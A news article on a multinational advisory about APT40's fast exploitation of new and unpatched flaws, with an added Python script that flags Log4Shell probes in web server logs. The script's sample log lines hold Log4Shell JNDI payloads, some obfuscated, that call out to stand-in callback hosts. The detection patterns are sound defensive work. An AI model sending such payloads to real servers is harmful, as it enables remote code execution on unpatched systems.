China’s APT40 targets new vulnerabilities and can exploit them within hours
Chinese state-sponsored threat actors, tracked by Western cybersecurity agencies as APT40, are moving fast. They hunt for previously undisclosed vulnerabilities, rapidly build exploits for them, and deploy those exploits as soon as they are ready.
In some cases, the entire process from discovering the vulnerability to exploiting it took just a few hours.
This is evident from a new security advisory published jointly by the national cybersecurity agencies of Australia, the US, Canada, New Zealand, Japan, South Korea, the UK and Germany.
Targeted at SOHO equipment
Two years ago, the Australian Cyber Security Centre (ACSC) was called in by a local company to assist with a cyberattack. With the victim’s permission, the agency “deployed host-based sensors to likely compromised hosts on the organization’s network” to monitor and map the attacker’s activities.
The advisory is the result of that analysis and states that APT40 “has the capability to rapidly transform and adapt proof-of-concept(s) (POCs) of new vulnerabilities and immediately deploy them against target networks that have the associated vulnerability infrastructure.”
In addition to looking for new bugs, the group also scours the Internet for known vulnerabilities that have not yet been patched and thus provide an easy gateway into the target infrastructure.
“This regular reconnaissance allows the group to identify vulnerable, end-of-life, or no longer serviceable devices on networks of interest and quickly deploy exploits,” the agencies said. They scan for devices that are still vulnerable to Log4Shell, Atlassian Confluence flaws, and known Microsoft Exchange vulnerabilities.
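The scanning the agencies describe leaves traces in ordinary web server logs. As an added example, not code from the advisory or from any of the agencies involved, the script below parses Apache-style access log lines and flags the Log4Shell probe pattern (`${jndi:` lookups) in the request line, referer and user agent, including URL-encoded and nested-lookup variants that defeat a naive substring match. The log lines, IP addresses and callback hosts are constructed (RFC 5737 documentation ranges); field names and the helper functions are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format. Addresses come from
# the RFC 5737 documentation ranges; none of this is real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jul/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jul/2024:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10/a}"
203.0.113.9 - - [01/Jul/2024:10:02:14 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.11/b} HTTP/1.1" 404 120 "-" "curl/8.0"
203.0.113.11 - - [01/Jul/2024:10:03:22 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2F198.51.100.12%2Fc%7D HTTP/1.1" 404 120 "-" "python-requests/2.31"
203.0.113.13 - - [01/Jul/2024:10:04:00 +0000] "GET /about HTTP/1.1" 200 800 "${jndi:ldap://198.51.100.14/d}" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [time], "request", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Log4j lookup wrappers commonly used to split up the literal "${jndi:" string.
# Each is rewritten to its inner value so the final check sees the plain form.
WRAPPERS = [
    re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.I),   # ${lower:j}   -> j
    re.compile(r'\$\{::-([^{}]*)\}', re.I),                # ${::-j}      -> j
    re.compile(r'\$\{[^{}:]+:[^{}]*:-([^{}]*)\}', re.I),   # ${env:X:-j}  -> j
]

# After normalization: ${jndi:<scheme>://<host>...  (host stops at / : } or whitespace)
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>[^/:}\s]+)', re.I)


def normalize(value: str, rounds: int = 5) -> str:
    """URL-decode until stable, then unwrap nested lookups until stable, lowercase."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    for _ in range(rounds):
        before = value
        for pat in WRAPPERS:
            value = pat.sub(r'\1', value)
        if value == before:
            break
    return value.lower()


def find_jndi(value: str):
    """Return (scheme, callback_host) if a JNDI lookup is present, else None."""
    m = JNDI_RE.search(normalize(value))
    return (m.group('scheme'), m.group('host')) if m else None


def scan_line(line: str):
    """Parse one log line; return a finding dict for the first attacker-controlled field that hits."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not in the expected format; a real pipeline would count these
    for field in ('request', 'referer', 'user_agent'):
        hit = find_jndi(m.group(field))
        if hit:
            scheme, host = hit
            return {'src': m.group('src'), 'ts': m.group('ts'), 'field': field,
                    'scheme': scheme, 'callback_host': host}
    return None


def scan_log(text: str):
    """Scan a whole log body and return the list of findings in log order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ts']}  {finding['src']}  field={finding['field']}  "
              f"{finding['scheme']}://{finding['callback_host']}")
```

The callback host is the most useful field to pivot on: a single scanner typically reuses one LDAP/RMI/DNS listener across many targets, so grouping findings by `callback_host` separates one campaign's sweep from background noise. Decoding is bounded (`rounds`) so a hostile input cannot make the normalizer loop indefinitely; a hit only tells you a probe arrived, not that the application was vulnerable, which still has to be established from the Log4j version on the host.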
“APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors for its operations in Australia,” the researchers added. “Many of these SOHO devices are end-of-life or unpatched, posing soft targets for N-day exploitation.”
However, attacking through SOHO devices is a double-edged sword: it also gives security services the opportunity to track and analyze the attackers, which helps in building defenses.
Via The Register